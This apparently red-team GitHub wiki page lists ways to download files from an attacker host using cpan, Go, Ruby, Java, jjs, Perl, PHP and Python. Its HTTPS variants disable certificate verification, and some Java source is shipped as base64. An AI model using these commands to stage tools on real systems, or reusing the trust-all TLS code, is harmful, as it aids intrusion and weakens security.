DL_ _OSA_ _Scripting_Languages - lighthouseitsecurity/barabbas GitHub Wiki
OVERVIEW:
-
cpan(HTTP; HTTPS) -
go(HTTP; HTTPS) -
irb(HTTP; HTTPS) -
java+javac(HTTP; HTTPS) -
jjs(HTTP; HTTPS) -
perl(HTTP; HTTPS) -
php(HTTP; HTTPS) -
python(HTTP; HTTPS) -
ruby(HTTP; HTTPS)
NOTE: for the sake of brevity, documenting each process for Linux OS only
- process for Windows OS has minor (self-explanatory) differences
(identify supported options - languages - file download - terminal)
tools=("cpan" "go" "irb" "java" "javac" "jjs" "perl" "php*" "python2*" "python3*" "ruby*"); echo '[*] languages - file download - available options'; for tool in ${tools[@]}; do echo " [*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done
https://linux.die.net/man/1/cpan
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
cpan;
! use File::Fetch; my $file=(File::Fetch->new(uri=>"$ENV{URL}"))->fetch();
quit
md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
cpan;
! use Env; use Env qw(URL RFILE); use LWP::UserAgent; my $req=LWP::UserAgent->new; $req->ssl_opts(verify_hostname=>0); $req->ssl_opts(SSL_verify_mode=>0); $req->get($URL,":content_file"=>$RFILE);
quit
md5sum $PWD/$RFILE;
TESTED ON: Kali 2023.2
NOTES:
- temporary directory can not be under
/tmp(will result with an error; file transfer will fail)- use user-writable directory
- file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
export TMPDIR=$(pwd);
echo "package main; import(\"os\"; \"io\"; \"net/http\"); func main() { lfile, err := os.Create(\"$RFILE\"); _ = err; defer lfile.Close(); rfile := \"$URL\"; response, err := http.Get(rfile); defer response.Body.Close(); io.Copy(lfile, response.Body); }" > dl.go;
go run dl.go; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
export TMPDIR=$(pwd);
echo "package main; import(\"os\"; \"io\"; \"net/http\"; \"crypto/tls\"); func main() { lfile, err := os.Create(\"$RFILE\"); _ = err; defer lfile.Close(); http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}; rfile := \"$URL\"; response, err := http.Get(rfile); defer response.Body.Close(); io.Copy(lfile, response.Body); }" > dl.go;
go run dl.go; md5sum $PWD/$RFILE;
https://linux.die.net/man/1/irb
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
irb;
require "net/http"; File.write(ENV["RFILE"], Net::HTTP.get(URI.parse(ENV["URL"])));
quit;
md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
irb
require "net/http"; https=Net::HTTP.new(ENV["ATT_HOST"], ENV["ATT_PORT"]); https.use_ssl=true; https.verify_mode=OpenSSL::SSL::VERIFY_NONE; res=https.start{|cx| cx.request(Net::HTTP::Get.new(ENV["ATT_PATH"] + ENV["RFILE"]))}; p res; File.write(ENV["RFILE"], res.body);
quit;
md5sum $PWD/$RFILE;
https://docs.oracle.com/en/java/javase/17/docs/specs/man/java.html
https://docs.oracle.com/en/java/javase/17/docs/specs/man/javac.html
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] copy script source code
HttpGetFileDownload.java
import java.io.IOException;
import java.io.FileOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.nio.channels.ReadableByteChannel;
public class HttpGetFileDownload {
public static void main(String[] args) {
ReadableByteChannel readableChannelForHttpResponseBody = null;
FileChannel fileChannelForDownloadedFile = null;
if(args.length != 2) {
System.out.println("[*] Usage: java HttpGetFileDownload <TARGET_FILE_URL> <LOCAL_FILE>");
System.exit(0);
}
String URL = args[0];
String LFILE = args[1];
try {
URL targetURL = new URL(URL);
HttpURLConnection urlConnection = (HttpURLConnection) targetURL.openConnection();
readableChannelForHttpResponseBody = Channels.newChannel(urlConnection.getInputStream());
FileOutputStream fosForDownloadedFile = new FileOutputStream(LFILE);
fileChannelForDownloadedFile = fosForDownloadedFile.getChannel();
fileChannelForDownloadedFile.transferFrom(readableChannelForHttpResponseBody, 0, Long.MAX_VALUE);
} catch (IOException e) {
e.printStackTrace();
} finally {
if (readableChannelForHttpResponseBody != null) {
try {
readableChannelForHttpResponseBody.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (fileChannelForDownloadedFile != null) {
try {
fileChannelForDownloadedFile.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
// EoF
(base64-decoding one-line script)
echo aW1wb3J0IGphdmEuaW8uSU9FeGNlcHRpb247CmltcG9ydCBqYXZhLmlvLkZpbGVPdXRwdXRTdHJlYW07CmltcG9ydCBqYXZhLm5ldC5IdHRwVVJMQ29ubmVjdGlvbjsKaW1wb3J0IGphdmEubmV0LlVSTDsKaW1wb3J0IGphdmEubmlvLmNoYW5uZWxzLkNoYW5uZWxzOwppbXBvcnQgamF2YS5uaW8uY2hhbm5lbHMuRmlsZUNoYW5uZWw7CmltcG9ydCBqYXZhLm5pby5jaGFubmVscy5SZWFkYWJsZUJ5dGVDaGFubmVsOwoKcHVibGljIGNsYXNzIEh0dHBHZXRGaWxlRG93bmxvYWQgewogICAgcHVibGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJncykgewogICAgICAgIFJlYWRhYmxlQnl0ZUNoYW5uZWwgcmVhZGFibGVDaGFubmVsRm9ySHR0cFJlc3BvbnNlQm9keSA9IG51bGw7CiAgICAgICAgRmlsZUNoYW5uZWwgZmlsZUNoYW5uZWxGb3JEb3dubG9hZGVkRmlsZSA9IG51bGw7CiAgICAgICAgaWYoYXJncy5sZW5ndGggIT0gMikgewogICAgICAgICAgICBTeXN0ZW0ub3V0LnByaW50bG4oIlsqXSBVc2FnZTogamF2YSBIdHRwR2V0RmlsZURvd25sb2FkIDxUQVJHRVRfRklMRV9VUkw+IDxMT0NBTF9GSUxFPiIpOwogICAgICAgICAgICBTeXN0ZW0uZXhpdCgwKTsKICAgICAgICB9CiAgICAgICAgU3RyaW5nIFVSTCA9IGFyZ3NbMF07CiAgICAgICAgU3RyaW5nIExGSUxFID0gYXJnc1sxXTsKICAgICAgICB0cnkgewogICAgICAgICAgICBVUkwgdGFyZ2V0VVJMID0gbmV3IFVSTChVUkwpOwogICAgICAgICAgICBIdHRwVVJMQ29ubmVjdGlvbiB1cmxDb25uZWN0aW9uID0gKEh0dHBVUkxDb25uZWN0aW9uKSB0YXJnZXRVUkwub3BlbkNvbm5lY3Rpb24oKTsKICAgICAgICAgICAgcmVhZGFibGVDaGFubmVsRm9ySHR0cFJlc3BvbnNlQm9keSA9IENoYW5uZWxzLm5ld0NoYW5uZWwodXJsQ29ubmVjdGlvbi5nZXRJbnB1dFN0cmVhbSgpKTsKICAgICAgICAgICAgRmlsZU91dHB1dFN0cmVhbSBmb3NGb3JEb3dubG9hZGVkRmlsZSA9IG5ldyBGaWxlT3V0cHV0U3RyZWFtKExGSUxFKTsKICAgICAgICAgICAgZmlsZUNoYW5uZWxGb3JEb3dubG9hZGVkRmlsZSA9IGZvc0ZvckRvd25sb2FkZWRGaWxlLmdldENoYW5uZWwoKTsKICAgICAgICAgICAgZmlsZUNoYW5uZWxGb3JEb3dubG9hZGVkRmlsZS50cmFuc2ZlckZyb20ocmVhZGFibGVDaGFubmVsRm9ySHR0cFJlc3BvbnNlQm9keSwgMCwgTG9uZy5NQVhfVkFMVUUpOwogICAgICAgIH0gY2F0Y2ggKElPRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICB9IGZpbmFsbHkgewogICAgICAgICAgICBpZiAocmVhZGFibGVDaGFubmVsRm9ySHR0cFJlc3BvbnNlQm9keSAhPSBudWxsKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIHJlYWRhYmxlQ2hhbm5lbEZvckh0dHBSZXNwb25zZUJvZHkuY2xvc2UoKTsKICAgICAgICAgICAgICAgIH0gY2F0Y2ggKElPRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgICAgICAgICBlLnByaW50U3RhY2tUcmFjZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmIChmaWxlQ2hhbm5lbEZvckRvd25sb2FkZWRGaWxlICE9IG51bGwpIHsKICAgICAgICAgICAgICAgIHRyeSB7CiAgICAgICAgICAgICAgICAgICAgZmlsZUNoYW5uZWxGb3JEb3dubG9hZGVkRmlsZS5jbG9zZSgpOwogICAgICAgICAgICAgICAgfSBjYXRjaCAoSU9FeGNlcHRpb24gZSkgewogICAgICAgICAgICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9Cn0KLy8gRW9GCg== | base64 -d > HttpGetFileDownload.java
3. [CLIENT] compile source code
javac HttpGetFileDownload.java
4. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
5. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
java HttpGetFileDownload $URL $RFILE; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] copy script source code
HttpGetFileDownloadSelfSignedX509.java
import java.io.IOException;
import java.io.FileOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.nio.channels.ReadableByteChannel;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
public class HttpGetFileDownloadSelfSignedX509 {
private class DisableX509Verification {
private static void execute() {
TrustManager[] trustAllCerts = new TrustManager[] {
new X509TrustManager() {
public X509Certificate[] getAcceptedIssuers() {
return null;
}
@Override
public void checkClientTrusted(X509Certificate[] arg0, String arg1)
throws CertificateException {}
@Override
public void checkServerTrusted(X509Certificate[] arg0, String arg1)
throws CertificateException {}
}
};
SSLContext sc = null;
try {
sc = SSLContext.getInstance("SSL");
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
}
try {
sc.init(null, trustAllCerts, new java.security.SecureRandom());
} catch (KeyManagementException e) {
e.printStackTrace();
}
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
HostnameVerifier validHosts = new HostnameVerifier() {
@Override
public boolean verify(String arg0, SSLSession arg1) {
return true;
}
};
HttpsURLConnection.setDefaultHostnameVerifier(validHosts);
}
}
public static void main(String[] args) {
ReadableByteChannel readableChannelForHttpResponseBody = null;
FileChannel fileChannelForDownloadedFile = null;
if(args.length != 2) {
System.out.println("[*] Usage: java HttpGetFileDownload <TARGET_FILE_URL> <LOCAL_FILE>");
System.exit(0);
}
String URL = args[0];
String LFILE = args[1];
try {
URL targetURL = new URL(URL);
DisableX509Verification.execute();
HttpURLConnection urlConnection = (HttpURLConnection) targetURL.openConnection();
readableChannelForHttpResponseBody = Channels.newChannel(urlConnection.getInputStream());
FileOutputStream fosForDownloadedFile = new FileOutputStream(LFILE);
fileChannelForDownloadedFile = fosForDownloadedFile.getChannel();
fileChannelForDownloadedFile.transferFrom(readableChannelForHttpResponseBody, 0, Long.MAX_VALUE);
} catch (IOException e) {
e.printStackTrace();
} finally {
if (readableChannelForHttpResponseBody != null) {
try {
readableChannelForHttpResponseBody.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if (fileChannelForDownloadedFile != null) {
try {
fileChannelForDownloadedFile.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
// EoF
(base64-decoding one-line script)
echo aW1wb3J0IGphdmEuaW8uSU9FeGNlcHRpb247CmltcG9ydCBqYXZhLmlvLkZpbGVPdXRwdXRTdHJlYW07CmltcG9ydCBqYXZhLm5ldC5IdHRwVVJMQ29ubmVjdGlvbjsKaW1wb3J0IGphdmEubmV0LlVSTDsKaW1wb3J0IGphdmEubmlvLmNoYW5uZWxzLkNoYW5uZWxzOwppbXBvcnQgamF2YS5uaW8uY2hhbm5lbHMuRmlsZUNoYW5uZWw7CmltcG9ydCBqYXZhLm5pby5jaGFubmVscy5SZWFkYWJsZUJ5dGVDaGFubmVsOwppbXBvcnQgamF2YS5zZWN1cml0eS5LZXlNYW5hZ2VtZW50RXhjZXB0aW9uOwppbXBvcnQgamF2YS5zZWN1cml0eS5Ob1N1Y2hBbGdvcml0aG1FeGNlcHRpb247CmltcG9ydCBqYXZhLnNlY3VyaXR5LmNlcnQuQ2VydGlmaWNhdGVFeGNlcHRpb247CmltcG9ydCBqYXZhLnNlY3VyaXR5LmNlcnQuWDUwOUNlcnRpZmljYXRlOwppbXBvcnQgamF2YXgubmV0LnNzbC5Ib3N0bmFtZVZlcmlmaWVyOwppbXBvcnQgamF2YXgubmV0LnNzbC5IdHRwc1VSTENvbm5lY3Rpb247CmltcG9ydCBqYXZheC5uZXQuc3NsLlNTTENvbnRleHQ7CmltcG9ydCBqYXZheC5uZXQuc3NsLlNTTFNlc3Npb247CmltcG9ydCBqYXZheC5uZXQuc3NsLlRydXN0TWFuYWdlcjsKaW1wb3J0IGphdmF4Lm5ldC5zc2wuWDUwOVRydXN0TWFuYWdlcjsKCnB1YmxpYyBjbGFzcyBIdHRwR2V0RmlsZURvd25sb2FkU2VsZlNpZ25lZFg1MDkgewogICAgcHJpdmF0ZSBjbGFzcyBEaXNhYmxlWDUwOVZlcmlmaWNhdGlvbiB7CiAgICAgICAgcHJpdmF0ZSBzdGF0aWMgdm9pZCBleGVjdXRlKCkgewogICAgICAgICAgICBUcnVzdE1hbmFnZXJbXSB0cnVzdEFsbENlcnRzID0gbmV3IFRydXN0TWFuYWdlcltdIHsKICAgICAgICAgICAgICAgIG5ldyBYNTA5VHJ1c3RNYW5hZ2VyKCkgewogICAgICAgICAgICAgICAgICAgIHB1YmxpYyBYNTA5Q2VydGlmaWNhdGVbXSBnZXRBY2NlcHRlZElzc3VlcnMoKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiBudWxsOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICAgICBAT3ZlcnJpZGUKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgdm9pZCBjaGVja0NsaWVudFRydXN0ZWQoWDUwOUNlcnRpZmljYXRlW10gYXJnMCwgU3RyaW5nIGFyZzEpCiAgICAgICAgICAgICAgICAgICAgICB0aHJvd3MgQ2VydGlmaWNhdGVFeGNlcHRpb24ge30KICAgICAgICAgICAgICAgICAgICBAT3ZlcnJpZGUKICAgICAgICAgICAgICAgICAgICBwdWJsaWMgdm9pZCBjaGVja1NlcnZlclRydXN0ZWQoWDUwOUNlcnRpZmljYXRlW10gYXJnMCwgU3RyaW5nIGFyZzEpCiAgICAgICAgICAgICAgICAgICAgICB0aHJvd3MgQ2VydGlmaWNhdGVFeGNlcHRpb24ge30KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfTsKICAgICAgICAgICAgU1NMQ29udGV4dCBzYyA9IG51bGw7CiAgICAgICAgICAgIHRyeSB7CiAgICAgICAgICAgICAgICBzYyA9IFNTTENvbnRleHQuZ2V0SW5zdGFuY2UoIlNTTCIpOwogICAgICAgICAgICB9IGNhdGNoIChOb1N1Y2hBbGdvcml0aG1FeGNlcHRpb24gZSkgewogICAgICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICAgICAgfQogICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgc2MuaW5pdChudWxsLCB0cnVzdEFsbENlcnRzLCBuZXcgamF2YS5zZWN1cml0eS5TZWN1cmVSYW5kb20oKSk7CiAgICAgICAgICAgIH0gY2F0Y2ggKEtleU1hbmFnZW1lbnRFeGNlcHRpb24gZSkgewogICAgICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICAgICAgfQogICAgICAgICAgICBIdHRwc1VSTENvbm5lY3Rpb24uc2V0RGVmYXVsdFNTTFNvY2tldEZhY3Rvcnkoc2MuZ2V0U29ja2V0RmFjdG9yeSgpKTsKICAgICAgICAgICAgSG9zdG5hbWVWZXJpZmllciB2YWxpZEhvc3RzID0gbmV3IEhvc3RuYW1lVmVyaWZpZXIoKSB7CiAgICAgICAgICAgICAgICBAT3ZlcnJpZGUKICAgICAgICAgICAgICAgIHB1YmxpYyBib29sZWFuIHZlcmlmeShTdHJpbmcgYXJnMCwgU1NMU2Vzc2lvbiBhcmcxKSB7CiAgICAgICAgICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH07CiAgICAgICAgICAgIEh0dHBzVVJMQ29ubmVjdGlvbi5zZXREZWZhdWx0SG9zdG5hbWVWZXJpZmllcih2YWxpZEhvc3RzKTsKICAgICAgICB9CiAgICB9CiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihTdHJpbmdbXSBhcmdzKSB7CiAgICAgICAgUmVhZGFibGVCeXRlQ2hhbm5lbCByZWFkYWJsZUNoYW5uZWxGb3JIdHRwUmVzcG9uc2VCb2R5ID0gbnVsbDsKICAgICAgICBGaWxlQ2hhbm5lbCBmaWxlQ2hhbm5lbEZvckRvd25sb2FkZWRGaWxlID0gbnVsbDsKICAgICAgICBpZihhcmdzLmxlbmd0aCAhPSAyKSB7CiAgICAgICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigiWypdIFVzYWdlOiBqYXZhIEh0dHBHZXRGaWxlRG93bmxvYWQgPFRBUkdFVF9GSUxFX1VSTD4gPExPQ0FMX0ZJTEU+Iik7CiAgICAgICAgICAgIFN5c3RlbS5leGl0KDApOwogICAgICAgIH0KICAgICAgICBTdHJpbmcgVVJMID0gYXJnc1swXTsKICAgICAgICBTdHJpbmcgTEZJTEUgPSBhcmdzWzFdOwogICAgICAgIHRyeSB7CiAgICAgICAgICAgIFVSTCB0YXJnZXRVUkwgPSBuZXcgVVJMKFVSTCk7CiAgICAgICAgICAgIERpc2FibGVYNTA5VmVyaWZpY2F0aW9uLmV4ZWN1dGUoKTsKICAgICAgICAgICAgSHR0cFVSTENvbm5lY3Rpb24gdXJsQ29ubmVjdGlvbiA9IChIdHRwVVJMQ29ubmVjdGlvbikgdGFyZ2V0VVJMLm9wZW5Db25uZWN0aW9uKCk7CiAgICAgICAgICAgIHJlYWRhYmxlQ2hhbm5lbEZvckh0dHBSZXNwb25zZUJvZHkgPSBDaGFubmVscy5uZXdDaGFubmVsKHVybENvbm5lY3Rpb24uZ2V0SW5wdXRTdHJlYW0oKSk7CiAgICAgICAgICAgIEZpbGVPdXRwdXRTdHJlYW0gZm9zRm9yRG93bmxvYWRlZEZpbGUgPSBuZXcgRmlsZU91dHB1dFN0cmVhbShMRklMRSk7CiAgICAgICAgICAgIGZpbGVDaGFubmVsRm9yRG93bmxvYWRlZEZpbGUgPSBmb3NGb3JEb3dubG9hZGVkRmlsZS5nZXRDaGFubmVsKCk7CiAgICAgICAgICAgIGZpbGVDaGFubmVsRm9yRG93bmxvYWRlZEZpbGUudHJhbnNmZXJGcm9tKHJlYWRhYmxlQ2hhbm5lbEZvckh0dHBSZXNwb25zZUJvZHksIDAsIExvbmcuTUFYX1ZBTFVFKTsKICAgICAgICB9IGNhdGNoIChJT0V4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7CiAgICAgICAgfSBmaW5hbGx5IHsKICAgICAgICAgICAgaWYgKHJlYWRhYmxlQ2hhbm5lbEZvckh0dHBSZXNwb25zZUJvZHkgIT0gbnVsbCkgewogICAgICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgICAgICByZWFkYWJsZUNoYW5uZWxGb3JIdHRwUmVzcG9uc2VCb2R5LmNsb3NlKCk7CiAgICAgICAgICAgICAgICB9IGNhdGNoIChJT0V4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBpZiAoZmlsZUNoYW5uZWxGb3JEb3dubG9hZGVkRmlsZSAhPSBudWxsKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIGZpbGVDaGFubmVsRm9yRG93bmxvYWRlZEZpbGUuY2xvc2UoKTsKICAgICAgICAgICAgICAgIH0gY2F0Y2ggKElPRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgICAgICAgICBlLnByaW50U3RhY2tUcmFjZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQp9Ci8vIEVvRgo= | base64 -d > HttpGetFileDownloadSelfSignedX509.java
3. [CLIENT] compile source code
javac HttpGetFileDownloadSelfSignedX509.java
4. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
5. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
java HttpGetFileDownloadSelfSignedX509 $URL $RFILE; md5sum $PWD/$RFILE;
https://docs.oracle.com/en/java/javase/14/docs/specs/man/jjs.html
TESTED ON: Kali 2023.2
NOTES:
- (>= Java SE 8)
- file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
echo "var URL=Java.type('java.net.URL'); var ws=new URL(\"$URL\"); var Channels=Java.type('java.nio.channels.Channels'); var rbc=Channels.newChannel(ws.openStream()); var FileOutputStream=Java.type('java.io.FileOutputStream'); var fos=new FileOutputStream(\"$RFILE\"); fos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE); fos.close(); rbc.close();" | jjs; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
TODO
https://linux.die.net/man/1/perl
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
perl -e 'use Env; use Env qw(URL RFILE); use LWP::Simple; getstore($URL, $RFILE);'; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
perl -e 'use Env; use Env qw(URL RFILE); use LWP::UserAgent; $req=LWP::UserAgent->new; $req->ssl_opts(verify_hostname=>0); $req->ssl_opts(SSL_verify_mode=>0); $req->get($URL,":content_file"=>$RFILE);'; md5sum $PWD/$RFILE;
https://linux.die.net/man/1/php
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
php -r '$c=file_get_contents(getenv("URL")); file_put_contents(getenv("RFILE"), $c);'; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
php -r '$a=array("ssl"=>array("verify_peer"=>false,"verify_peer_name"=>false,),); $c=file_get_contents(getenv("URL"), false, stream_context_create($a)); file_put_contents(getenv("RFILE"), $c);'; md5sum $PWD/$RFILE;
https://linux.die.net/man/1/python
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
python2 -c 'from os import environ as e; from urllib import urlretrieve; urlretrieve(e["URL"], e["RFILE"])'; md5sum $PWD/$RFILE;
python3 -c 'from os import environ as e; from urllib.request import urlretrieve; urlretrieve(e["URL"], e["RFILE"])'; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
python2 -c 'from os import environ as e; from urllib import urlretrieve; import ssl; ssl._create_default_https_context=ssl._create_unverified_context; urlretrieve(e["URL"], e["RFILE"])'; md5sum $PWD/$RFILE;
python3 -c 'from os import environ as e; from urllib.request import urlretrieve; import ssl; ssl._create_default_https_context=ssl._create_unverified_context; urlretrieve(e["URL"], e["RFILE"])'; md5sum $PWD/$RFILE;
https://linux.die.net/man/1/ruby
TESTED ON: Kali 2023.2
NOTE: file downloaded to current directory
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
export URL=http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE;
ruby -e 'require "net/http"; File.write(ENV["RFILE"], Net::HTTP.get(URI.parse(ENV["URL"])))'; md5sum $PWD/$RFILE;
NOTE: if using HTTPS, replace http with https
1. [CLIENT] open terminal session
(open terminal window)
2. [CLIENT] specify file transfer parameters
export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export RFILE=testfile_200MB;
3. [CLIENT] download file
ruby -e 'require "net/http"; https=Net::HTTP.new(ENV["ATT_HOST"], ENV["ATT_PORT"]); https.use_ssl=true; https.verify_mode=OpenSSL::SSL::VERIFY_NONE; res=https.start{|cx| cx.request(Net::HTTP::Get.new(ENV["ATT_PATH"] + ENV["RFILE"]))}; p res; File.write(ENV["RFILE"], res.body);'; md5sum $PWD/$RFILE;